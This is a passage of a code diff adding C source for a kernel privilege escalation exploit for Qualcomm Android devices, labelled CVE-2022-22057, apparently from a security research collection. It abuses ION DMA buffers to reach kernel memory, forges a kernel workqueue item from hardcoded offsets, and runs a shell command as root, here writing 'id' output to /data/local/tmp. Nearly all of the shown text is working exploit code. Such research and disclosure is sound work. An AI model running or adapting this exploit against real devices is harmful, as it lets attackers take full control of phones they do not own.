ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_fd\n"); + } + struct ion_buffer* wq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + uint64_t pwq_addr = 0; + for (int i = 0; i < 3; i++) { + pwq_addr = get_pwq_addr(wq_fd, wq_buf, table_vaddr, table_region, wq_addr); + if (pwq_addr != 0) break; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + wq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (wq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for wq_fd\n"); + } + wq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + + if (pwq_addr == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to get pwq_addr\n"); + } + + int pwq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pwq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pwq_fd\n"); + } + struct ion_buffer* pwq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + uint64_t pwq_region = 0; + uint64_t pool_addr = 0; + for (int i = 0; i < 3; i++) { + pool_addr = map_pwq(pwq_fd, pwq_buf, table_vaddr, table_region, pwq_addr, &pwq_region); + if (pool_addr != 0) break; + munmap((void*)page_align(pwq_region), 0x1000); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + pwq_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pwq_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pwq_fd\n"); + } + pwq_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (pool_addr == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to map pwq_addr\n"); + } + + ion_dma_regions[1] = pwq_region; + int pool_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pool_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pool_fd\n"); + } + struct ion_buffer* pool_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + uint64_t pool_region = 0; + for (int i = 0; i < 3; i++) { + uint64_t worklist = map_pwq_pool(pool_fd, pool_buf, table_vaddr, table_region, pool_addr, &pool_region); + if (pool_region != 0) break; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + pool_fd = get_ion_dma_fd(&(found_dma[0]), ion_dma_fds, skip, ION_DMA_SIZE); + if (pool_fd == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to find ion region for pool_fd\n"); + } + pool_buf = get_ion_buffer(&(found_idx[0]), region_ptr, skip, SLAB_SIZE); + } + if (pool_region == 0) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "Failed to map_pwq_pool\n"); + } + ion_dma_regions[2] = pool_region; + table_vaddr += 2 * 128; + table_region += 2 * 128; + skip++; + + setup_sub_info(table_region, table_vaddr, kernel_shift, table_vaddr + 128, table_region + 128); + printf("queue work\n"); + sleep(1); + migrate_to_cpu(0); + + int queue_res = 0; + for (int i = 0; i < 3; i++) { + queue_res = queue_work((uint8_t*)pool_region, pool_addr, (uint8_t*)pwq_region, pwq_addr, table_region, table_vaddr, pool_addr + WORKLIST_OFF); + if (queue_res == 0) break; + printf("[-] Failed to run command, retry\n"); + setup_sub_info(table_region, table_vaddr, kernel_shift, table_vaddr + 128, table_region + 128); + sleep(1); + } + if (queue_res == -1) { + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + err(1, "failed to queue work\n"); + } + printf("finished queue work\n"); + repair_heap(ion_heap, ion_heap_vaddr, &(ion_dma_fds[0]), &(ion_dma_regions[0]), ION_DMA_SIZE); + sleep(1); + close(ion_fd); + printf("finished spraying\n"); + + close_unused_fds(&(syncfds[0]), SYNC_FILE_NUM, -1); + printf("finished\n"); + +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.c b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.c new file mode 100644 index 0000000..92721d0 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.c @@ -0,0 +1,307 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "work_queue_utils.h" +#include "addr_utils.h" +#include "ion_utils.h" +#include "fake_obj_util.h" +#include "cpu_utils.h" +#include "kgsl_ioctl.h" + +//workqueue_struct::numa_pwq_tbl +#define NUMA_PWQ_TBL_OFF 0x110 +//pool_workqueue::pool +#define PWQ_POOL_OFF 0x0 +//pool_workqueue::refcnt +#define REFCNT_OFF 0x18 +//pool_workqueue::work_color +#define WORK_COLOR_OFF 0x10 +//pool_workqueue::nr_in_flight +#define NR_IN_FLIGHT 0x1c +//pool_workqueue::nr_active +#define NR_ACTIVE 0x58 +//pool_workqueue::max_active +#define MAX_ACTIVE 0x5c +//work_struct::entry +#define WORK_STRUCT_ENTRY 0x8 + +#define WORK_STRUCT_COLOR_SHIFT 4ul + +#define CALL_USERMODE_OFF 0x16b5434ul + +//run_cmd.envp +#define RUN_CMD_ENVP_OFF 0x2c8d158 + +#define WORK_STRUCT_PENDING 1 + +#define WORK_STRUCT_PWQ 4 + +//Padding between compilers not reliable, so use hardcode offsets +#define SUB_INFO_COMPLETE 0x30 + +#define SUB_INFO_PATH 0x38 + +#define SUB_INFO_ARGV 0x40 + +#define SUB_INFO_ENVP 0x48 + +#define SUB_INFO_FUNC 0x18 + +#define SUB_INFO_WAIT 0x58 + +#define SUB_INFO_RET 0x5c + +#define SUB_INFO_SIZE 128 + +#define COMPLETION_LIST_OFF (0x8 + 0x8) + +struct work_struct { + uint64_t data; + struct list_head entry; + uint64_t func; +}; + +struct subprocess_info { + struct work_struct work; + struct completion *complete; + uint64_t path; + uint64_t argv; + uint64_t envp; + void *file; + int wait; + int retval; + int pid; + void* init; + void* cleanup; + void *data; +}; + +void setup_sub_info(uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t kernel_shift, uint64_t arg_vaddr, uint8_t* arg_region) { + memset(sub_info, 0, SUB_INFO_SIZE); + const char* path = "/system/bin/sh"; + + const char* arg1 = "-c"; + const char* cmd = "/system/bin/id > /data/local/tmp/id.txt"; + memset(arg_region, 0, 0x280); + memcpy(arg_region + 0x80, path, strlen(path)); + + memcpy(arg_region + 0x100, arg1, strlen(arg1)); + memcpy(arg_region + 0x180, cmd, strlen(cmd)); + uint64_t* argv = (uint64_t*)arg_region; + + argv[0] = arg_vaddr + 0x80; + argv[1] = arg_vaddr + 0x100; + argv[2] = arg_vaddr + 0x180; + argv[3] = 0; + + *((uint64_t*)(sub_info + SUB_INFO_FUNC)) = CALL_USERMODE_OFF + KERNEL_VBASE + kernel_shift; + + *((uint64_t*)(sub_info + SUB_INFO_PATH)) = arg_vaddr + 0x80; + *((uint64_t*)(sub_info + SUB_INFO_ARGV)) = arg_vaddr; + + *((uint64_t*)(sub_info + SUB_INFO_ENVP)) = RUN_CMD_ENVP_OFF + KERNEL_VBASE + kernel_shift; + + uint64_t complete_addr = arg_vaddr + 0x200; + *((uint64_t*)(sub_info + SUB_INFO_COMPLETE)) = complete_addr; + uint8_t* completion = arg_region + 0x200; + *((uint64_t*)(completion + COMPLETION_LIST_OFF)) = complete_addr + COMPLETION_LIST_OFF; + *((uint64_t*)(completion + COMPLETION_LIST_OFF + 0x8)) = complete_addr + COMPLETION_LIST_OFF; + + *((uint32_t*)(sub_info + SUB_INFO_WAIT)) = 0; + *((uint32_t*)(sub_info + SUB_INFO_RET)) = 0xfe; + +} + +static inline int work_color_to_flags(int color) { + return color << WORK_STRUCT_COLOR_SHIFT; +} + +uint8_t* map_addr_to_ion(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t vaddr) { + uint64_t phys_addr = virt_to_phys(vaddr); + uint64_t offset = phys_addr % 0x1000; + patch_ion_buffer(buffer, table_vaddr, table_region, phys_addr, 0x1000); + uint64_t len = 0x1000; + void* ion_region = mmap(NULL, len, PROT_READ|PROT_WRITE, MAP_SHARED, ion_dma_fd, 0); + if (ion_region == MAP_FAILED) { + return MAP_FAILED; + } + return (uint8_t*)(ion_region + offset); +} + +uint64_t get_wq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_ptr_addr) { + printf("wq_ptr_addr: %lx\n", wq_ptr_addr); + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, wq_ptr_addr); + if (region == MAP_FAILED) { + printf("get_wq_addr failed\n"); + return 0; + } + uint64_t* addr_ptr = (uint64_t*)region; + uint64_t wq_addr = *addr_ptr; + munmap((void*)page_align((uint64_t)region), 0x1000); + return wq_addr; +} + +uint64_t get_pwq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_addr) { + printf("wq_addr: %lx\n", wq_addr); + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, wq_addr); + if (region == MAP_FAILED) { + printf("get_pwq_addr failed\n"); + return 0; + } + uint64_t* addr_ptr = (uint64_t*)(region + NUMA_PWQ_TBL_OFF); + uint64_t pwq_addr = *addr_ptr; + printf("pwq_addr %lx\n", pwq_addr); + munmap((void*)page_align((uint64_t)region), 0x1000); + return pwq_addr; +} + +uint64_t map_pwq(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pwq_addr, uint64_t* pwq_region) { + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, pwq_addr); + if (region == MAP_FAILED) { + printf("map_pwq failed\n"); + return 0; + } + *pwq_region = (uint64_t)region; + uint64_t* addr_ptr = (uint64_t*)(region + PWQ_POOL_OFF); + uint64_t pool_addr = *addr_ptr; + printf("pool_addr %lx\n", pool_addr); + return pool_addr; +} + +uint64_t map_pwq_pool(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pool_addr, uint64_t* pool_region) { + uint8_t* region = map_addr_to_ion(ion_dma_fd, buffer, table_vaddr, table_region, pool_addr); + if (region == MAP_FAILED) { + printf("map_pwq_pool failed\n"); + return 0; + } + *pool_region = (uint64_t)region; + uint64_t* worklist = (uint64_t*)(region + WORKLIST_OFF); + printf("worklist %lx %lx\n", worklist[0], worklist[1]); + return *worklist; +} + +__attribute__((noinline)) int insert_work(uint32_t* nr_active, uint32_t* refcnt, uint32_t* nr_in_flight, volatile uint64_t* worklist, uint64_t work_entry_addr, uint64_t worklist_addr) { + uint32_t nr_act = *nr_active; + uint32_t inflight = *nr_in_flight; + uint32_t refcount = *refcnt; + *refcnt = refcount + 1; + *nr_active = nr_act + 1; + *nr_in_flight = inflight + 1; + if (worklist_addr == *worklist) { + worklist[0] = work_entry_addr; + worklist[1] = work_entry_addr; + return 0; + } + *refcnt = refcount; + *nr_active = nr_act; + *nr_in_flight = inflight; + return -1; +} + +void spin_lock(volatile uint32_t* lock) { + while (*lock); + *lock = 1; + return; +} + +void wake_up_queue() { + int kgsl_fd = open("/dev/kgsl-3d0", O_RDONLY); + struct kgsl_timeline_val param = {0}; + ioctl(kgsl_fd, IOCTL_KGSL_TIMELINE_QUERY, ¶m); + close(kgsl_fd); +} + +int queue_work(uint8_t* pool_region, uint64_t pool_addr, uint8_t* pwq_region, uint64_t pwq_addr, uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t worklist_addr) { + uint32_t* max_active = (uint32_t*)(pwq_region + MAX_ACTIVE); + uint32_t* nr_active = (uint32_t*)(pwq_region + NR_ACTIVE); + uint32_t* refcnt = (uint32_t*)(pwq_region + REFCNT_OFF); + uint32_t* work_color_ptr = (uint32_t*)(pwq_region + WORK_COLOR_OFF); + uint32_t* nr_in_flight = (uint32_t*)(pwq_region + NR_IN_FLIGHT); + volatile uint64_t* worklist = (uint64_t*)(pool_region + WORKLIST_OFF); + uint64_t work_entry_addr = sub_info_vaddr + WORK_STRUCT_ENTRY; + uint32_t* lock = (uint32_t*)(pool_region); + + migrate_to_cpu(0); + struct work_struct* work = (struct work_struct*)sub_info; + work->entry.next = worklist_addr; + work->entry.prev = worklist_addr; + int refcount = *refcnt; + if (refcount == 0) { + printf("memory pool has refcount 0\n"); + return -1; + } + printf("max_active %u nr_active %u\n", *max_active, *nr_active); + uint32_t work_color = *work_color_ptr; + uint32_t work_flags = work_color_to_flags(work_color); + work->data = (WORK_STRUCT_PENDING | WORK_STRUCT_PWQ | work_flags | pwq_addr); + printf("queuing work, waiting to aquire spin lock\n"); + int ret = 0; + for (int i = 0; i < 1000; i++) { + spin_lock(lock); + ret = insert_work(nr_active, refcnt, nr_in_flight + work_color, worklist, work_entry_addr, worklist_addr); + if (ret == -1) { + *lock = 0; + } else { + break; + } + usleep(100); + } + if (ret == 0) { + *lock = 0; + } else { + return -1; + } + printf("work_queued\n"); + sleep(1); + if (*worklist == work_entry_addr) { + wake_up_queue(); + } + + migrate_to_cpu(1); + struct timeval start, end; + long micros_used, secs_used; + int try_wake_up = 0; + + gettimeofday(&start, NULL); + + while(*worklist == work_entry_addr) { + gettimeofday(&end, NULL); + secs_used=(end.tv_sec - start.tv_sec); + if (secs_used > 2) { + if (try_wake_up < 3) { + wake_up_queue(); + try_wake_up++; + gettimeofday(&start, NULL); + } else { + printf("[-] Work queue may have stalled, try pressing power button to wake up\n"); + gettimeofday(&start, NULL); + } + } + usleep(1000); + } + printf("work processed\n"); + printf("complete %lx\n", *((uint64_t*)(sub_info + SUB_INFO_COMPLETE))); + uint32_t cmd_ret = *((uint32_t*)(sub_info + SUB_INFO_RET)); + printf("ret %d\n", cmd_ret); + printf("nr_active %u\n", *nr_active); + printf("worklist %lx\n", worklist[0]); + printf("work next %lx\n", work->entry.next); + if (*((uint32_t*)(sub_info + SUB_INFO_RET)) == 0) { + printf("[+] successfully run command and added id.txt in /data/local/tmp\n"); + } else { + printf("[-] Failed to run command, error code %d\n", cmd_ret); + return -1; + } + sleep(1); + + return 0; +} diff --git a/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h new file mode 100644 index 0000000..d901fb2 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE-2022-22057/work_queue_utils.h @@ -0,0 +1,26 @@ +#ifndef WORK_QUEUE_UTILS +#define WORK_QUEUE_UTILS + +#include "fake_obj_util.h" + +#define SYSTEM_UNBOUND_WQ_OFF 0x2b8f7f8ul + +#define KGSL_DRIVER_OFF 0x2d0a000 + +#define KGSL_MEMQUEUE_OFF (KGSL_DRIVER_OFF + 0x518) + +//worker_pool::worklist +#define WORKLIST_OFF 0x20 + +uint64_t get_wq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_ptr_addr); + +uint64_t get_pwq_addr(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t wq_addr); + +uint64_t map_pwq(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pwq_addr, uint64_t* pwq_region); + +uint64_t map_pwq_pool(int ion_dma_fd, struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t pool_addr, uint64_t* pool_region); + +int queue_work(uint8_t* pool_region, uint64_t pool_addr, uint8_t* pwq_region, uint64_t pwq_addr, uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t worklist_addr); + +void setup_sub_info(uint8_t* sub_info, uint64_t sub_info_vaddr, uint64_t kernel_shift, uint64_t arg_vaddr, uint8_t* arg_region); +#endif